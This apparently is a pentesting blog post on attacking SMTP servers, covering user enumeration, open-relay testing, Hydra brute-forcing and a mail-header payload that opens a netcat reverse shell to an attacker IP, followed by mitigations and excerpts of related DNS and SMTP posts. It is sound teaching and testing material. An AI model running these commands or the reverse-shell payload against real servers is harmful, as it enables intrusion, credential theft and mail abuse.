Skip to main content

SMTP Pentest Notes - Port 25

Pivoting for Red Teamers

SMTP Pentesting Notes

SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass.

Step 1: Enumerate the SMTP Server

Connect to the SMTP server using Telnet:

telnet <target-ip> 25

Look for the server banner, which may reveal its version and configuration.

Step 2: User Enumeration with VRFY & EXPN

Check if the server allows user verification:

VRFY admin
EXPN postmaster

If valid responses are received, the server is disclosing user accounts, which could aid brute-force attacks.

Step 3: Open Relay Testing

To check if the server allows unauthenticated email forwarding:

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Open Relay Test
This is a test message.
.

If the email is delivered successfully, the server is an open relay and can be exploited for spam or phishing attacks.

Step 4: Brute-Forcing SMTP Authentication

Use Hydra to attempt brute-force login:

hydra -L users.txt -P passwords.txt smtp://<target-ip> -s 25

If credentials are found, they may be used for unauthorized email access or further exploitation.

Step 5: Finding SMTP Vulnerabilities

Check the server banner for version details:

220 mail.example.com ESMTP Postfix 2.9.6

Search for known vulnerabilities:

searchsploit postfix

Refer to databases such as:

Step 6: Privilege Escalation via Misconfigured Mail Scripts

If the SMTP server interacts with external scripts, it may be possible to execute commands remotely:

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

If vulnerable, this could lead to Remote Code Execution (RCE).

Mitigation Recommendations

  • Disable VRFY & EXPN to prevent user enumeration.
  • Require authentication to prevent unauthorized access.
  • Close open relays to block email abuse.
  • Enable logging & monitoring to detect suspicious activity.
  • Keep software updated to mitigate known vulnerabilities.

Conclusion

SMTP servers can be an attacker's entry point if not properly secured. Understanding and testing for vulnerabilities ensures a more secure email infrastructure.

Labels:

Comments

Post a Comment

Popular posts from this blog

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...
Post a Comment
Read more

DNS Pentest - Port 53

Recon Banner Grabbing - Identify DNS Server Versions # Use dig to determine DNS server versions dig version.bind CHAOS TXT @DNS # Alternatively, use nmap script to grab the banner nmap --script dns-nsid <DNS_IP> # Alternatively, use telnet to grab the banner nc -nv -u <DNS_IP> 53 DNS Server Discovery # Using dig dig NS <target-domain> # Using nslookup nslookup -type=NS <target-domain> Enumeration Using DNS enum dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN> Using dig # Query DNS records dig hackviser.com # Query specific type of DNS records (e.g., A record) dig A hackviser.com # Perform a reverse DNS lookup dig -x <IP_ADDRESS> # Query a specific DNS server dig @<DNS_SERVER_IP> hackviser.com Using nslookup # Perform DNS queries nslookup hackviser.com # Query a specific type of DNS record (e.g., MX record) nslookup -type=MX hackviser.com # Query a specific DNS server nslookup ha...
Post a Comment
Read more

Thread Modelling Cheatsheet: Know Your Weaknesses Before Attackers Do!

Threat Modelling Part - 1 What is Threat Modelling?      Threat modelling is the process of identifying, assessing, and mitigating potential security threats before they happen. It helps teams anticipate how systems can be attacked and build defences proactively , not reactively. Key Concepts Threat: Something (like a hacker or malware) that could exploit a weakness. Vulnerability: A flaw in your system that can be exploited. Risk: The chance that a threat will exploit a vulnerability to cause damage. Analogy : Threat = Burglar Vulnerability = Unlocked door Risk = Getting robbed because the door is open in a bad neighborhood  Threat Modelling Process (High-Level) Define the Scope – What systems/apps are you evaluating? Identify Assets – What needs protection? (e.g. data, services) Identify Threats – Think like an attacker. What could go wrong? Analyze Vulnerabilities – What weaknesses exist? Prioritize Ri...
Post a Comment
Read more